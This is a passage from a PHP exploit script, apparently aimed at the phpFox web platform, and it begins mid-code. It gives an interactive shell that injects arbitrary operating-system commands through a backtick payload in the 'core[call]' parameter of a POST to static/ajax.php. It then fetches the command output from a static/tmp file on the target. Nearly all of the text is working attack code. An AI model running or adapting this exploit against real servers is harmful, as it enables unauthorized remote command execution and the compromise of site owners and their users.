\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /phpfox/\n"; die(); } list($host, $path) = array($argv[1], $argv[2]); $r_pack = "GET {$path}static/tmp HTTP/1.0\r\n"; $r_pack .= "Host: {$host}\r\n"; $r_pack .= "Connection: close\r\n\r\n"; $packet = "POST {$path}static/ajax.php?do=/ad/complete/ HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: %d\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "X_REQUESTED_WITH: XMLHttpRequest\r\n"; $packet .= "Connection: close\r\n\r\n%s"; while(1) { print "\nphofox-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; else if (preg_match('/\./', $cmd)) print "\nDots not allowed!\n"; else if (preg_match('/\)/', $cmd)) print "\nParenthesis not allowed!\n"; else { $payload = "core[call]=.(`{$cmd}>tmp`)."; http_send($host, sprintf($packet, strlen($payload), $payload)); $output = http_send($host, $r_pack); !preg_match('/404 not/i', $output) && preg_match('/\n\r\n(.*)/s', $output, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } }